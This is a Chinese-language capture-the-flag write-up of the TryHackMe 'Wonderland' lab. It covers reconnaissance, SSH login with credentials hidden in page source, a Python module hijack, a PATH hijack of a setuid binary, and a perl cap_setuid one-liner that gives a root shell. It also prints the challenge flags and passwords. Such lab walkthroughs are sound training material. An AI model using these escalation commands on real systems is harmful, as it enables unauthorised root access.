THM - Wonderland 靶機滲透
Fall down the rabbit hole and enter wonderland.
靶場地址
題目背景
Enter Wonderland and capture the flags.
靶機類型
免費靶機
過關條件
- Obtain the flag in user.txt
- Escalate your privileges, what is the flag in root.txt?
滲透過程
基本資訊
攻擊機IP:10.11.74.107
目標機IP:10.10.148.93
使用Nmap掃描Port
輸出內容
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
[*] Nmap: | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
[*] Nmap: |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
[*] Nmap: 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
[*] Nmap: |_http-title: Follow the white rabbit.
[*] Nmap: | http-methods:
[*] Nmap: |_ Supported Methods: GET HEAD POST OPTIONS
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.94SVN%E=4%D=3/14%OT=22%CT=1%CU=35167%PV=Y%DS=2%DC=T%G=Y%TM=65F2
[*] Nmap: OS:AF69%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)
[*] Nmap: OS:SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=109%TI
[*] Nmap: OS:=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5
[*] Nmap: OS:08ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O
[*] Nmap: OS:6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%D
[*] Nmap: OS:F=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0
[*] Nmap: OS:%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=
[*] Nmap: OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
[*] Nmap: OS:RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%I
[*] Nmap: OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
[*] Nmap: Uptime guess: 11.971 days (since Sat Mar 2 16:45:28 2024)
[*] Nmap: Network Distance: 2 hops
[*] Nmap: TCP Sequence Prediction: Difficulty=262 (Good luck!)
[*] Nmap: IP ID Sequence Generation: All zeros
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE (using port 554/tcp)
- 資訊整理
- 作業系統: Linux
- 開放PORT: 22,80
連線至Web服務
網頁原始碼
<!DOCTYPE html>
<head>
<title>Follow the white rabbit.</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Follow the White Rabbit.</h1>
<p>"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)</p>
<img src="/img/white_rabbit_1.jpg" style="height: 50rem;">
</body>
img 目錄可能有點東西,不過還是先目錄爆破一下
使用gobuster進行目錄爆破
輸出內容
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir --url http://10.10.148.93 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.148.93
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/index.html (Status: 301) [Size: 0] [--> ./]
/r (Status: 301) [Size: 0] [--> r/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
有
img目錄和r目錄
確認img目錄的內容
原始碼
<pre>
<a href="alice_door.jpg">alice_door.jpg</a>
<a href="alice_door.png">alice_door.png</a>
<a href="white_rabbit_1.jpg">white_rabbit_1.jpg</a>
</pre>
原始碼也沒有特殊的地方
我把三張圖片下載至本機。
使用 steghide 檢查是否有特殊的地方
white_rabbit_1.jpg
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
white_rabbit_1.jpg有夾雜著hint.txt,而且不用密碼就可以取得
使用下面指令提取內容
會得到一個hint.txt的檔案,檔案內容如下似乎在暗示著什麼....
alice_door.jpg
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide info alice_door.jpg
"alice_door.jpg":
format: jpeg
capacity: 68.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
alice_door.jpg有包含檔案,但是要輸入密碼才行,這個線索可以先留著,如果沒找到其他線索再對它暴力破解
alice_door.png
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide info alice_door.png
steghide: the file format of the file "alice_door.png" is not supported.
alice_door.png這張圖完全沒有東西
返回Web頁面進行檢查
在前面得到了下面資訊
而在使用gobuster時,也得到了一個r目錄,我在想,是不是最終連結會是下面這個 我用瀏覽器連過去後,出現下面畫面,但是畫面上似乎沒看見其他線索
我查看網頁原始碼
網頁原始碼
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
我在想
alice:HowDothTheLittleCrocodileImproveHisShiningTail這玩意應該不會就是ssh的帳密吧?
登入至SSH裡
使用MSF登入到SSH裡
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current data
base
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database
(Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs
/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space,
one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME alice
USERNAME => alice
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD HowDothTheLittleCrocodileImproveHisShiningTail
PASSWORD => HowDothTheLittleCrocodileImproveHisShiningTail
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.148.93
RHOSTS => 10.10.148.93
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 10.10.148.93:22 - Starting bruteforce
[+] 10.10.148.93:22 - Success: 'alice:HowDothTheLittleCrocodileImproveHisShiningTail' 'uid=1001(alice) gid=1001(alice) groups=1001(alice) Linux wonderland 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (10.11.74.107:40365 -> 10.10.148.93:22) at 2020-06-20 23:10:18 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH kali @ 10.11.74.107:40365 -> 10.10.148.93:22 (10.10.148.93)
看樣子,成功登入拿到session,在開始之前找flag之前先提前用linPEAS枚舉,看看能不能先收集到什麼有趣的線索
使用者
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash
root:x:0:0:root:/root:/bin/bash
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
當前使用者sudo 權限
Sudoers file: /etc/sudoers.d/alice is readable
alice ALL = (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
可能用來提權的capabilitie
Files with capabilities (limited to 50):
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
雖然有找到可用來提權的capabilitie,但是我沒有權限運行perl,現在確認alice的資料夾裡有什麼東西
- 有
root.txt和root.txt沒有權限可以打開, walrus_and_the_carpenter.py可讀可執行,但是無法編輯,不過根據前面蒐集到的資訊,sudo可以用rabbit的角色去執行
先看 walrus_and_the_carpenter.py 這支檔案的內容
walrus_and_the_carpenter.py
這是一段簡單的python程式碼,主要是將上面詩隨機抽出10行印出,不過他在開頭的部分有import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.
The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.
"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."
The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.
But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.
Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.
The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.
"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."
"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.
"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."
"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?
"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"
"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"
"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.
"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)
import random,或許可以在跟目錄創建的random.py的檔案,讓他不使用內建的random模組而是使用我建立的。
寫一個簡短的程式碼,讓用rabbit角色執行它,來獲得rabbit的權限
拿到rabbit角色權限後,進到他的資料夾裡,發現有一個setuid設定的檔案
rabbit@wonderland:/home/rabbit$ ls -al
ls -al
total 40
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
rabbit@wonderland:/home/rabbit$ python3 -m http.server 8000
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
使用strings查看teaParty檔案
發現──(kali㉿kali)-[~/Desktop]
└─$ strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
date沒有絕對路徑,所以建立一個假的給他
echo '#!/bin/bash' >> date
echo '/bin/bash' >> date
chmod +x date
export PATH=/home/rabbit:$PATH #將資料夾路徑設定在環境變量裡
執行結果
此時使用rabbit@wonderland:/home/rabbit$ ./teaParty
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ whoami
whoami
hatter
hatter@wonderland:/home/rabbit$
id命令,告訴我,目前我gid還是rabbit的,
因為之前找到可能用來提權的capabilitie,是設定在perl上,而且perl擁有者為root,群組為hatter
perl權限確認
所以必須gid為hatter才行,不過我在/home/hatter找到類似密碼的檔案
hatter@wonderland:/home/hatter:~$ find /usr/bin/perl -exec ls -l {} \;
find /usr/bin/perl -exec ls -l {} \;
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl
hatter@wonderland:/home/hatter$ ls -al
ls -al
total 28
drwxr-x--- 3 hatter hatter 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter 220 May 25 2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25 2020 .bashrc
drwxrwxr-x 3 hatter hatter 4096 May 25 2020 .local
-rw-r--r-- 1 hatter hatter 807 May 25 2020 .profile
-rw------- 1 hatter hatter 29 May 25 2020 password.txt
hatter@wonderland:/home/hatter$ cat password.txt
cat password.txt
WhyIsARavenLikeAWritingDesk?
su hatter重新切換身分,現在就可以正常使用perl
取得root.txt和user.txt
拿到完整的hatter權限後,運行下面指令切換到root權限
接著到 home/alice 裡的root.txt,讀取之前沒有權限讀取的內容輸出內容
hatter@wonderland:/home/alice$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami
root
# ls -al
total 68
drwxr-xr-x 6 alice alice 4096 Mar 14 16:51 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
drwx------ 2 alice alice 4096 May 25 2020 .cache
drwxr-x--- 3 alice alice 4096 Mar 14 15:18 .config
drwx------ 3 alice alice 4096 Mar 14 15:18 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw------- 1 alice alice 38 Mar 14 16:07 .python_history
-rw-r--r-- 1 alice alice 12288 Mar 14 16:46 .random.py.swp
-rw------- 1 alice alice 967 Mar 14 16:51 .viminfo
-rw-rw-r-- 1 alice alice 33 Mar 14 16:51 random.py
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
# cat root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
然後user.txt的內容則去/root目錄去找
輸出內容
# cd /root
# ls -al
total 28
drwx--x--x 4 root root 4096 May 25 2020 .
drwxr-xr-x 23 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4096 May 25 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 May 25 2020 .ssh
-rw-r--r-- 1 root root 32 May 25 2020 user.txt
# cat user.txt
thm{"Curiouser and curiouser!"}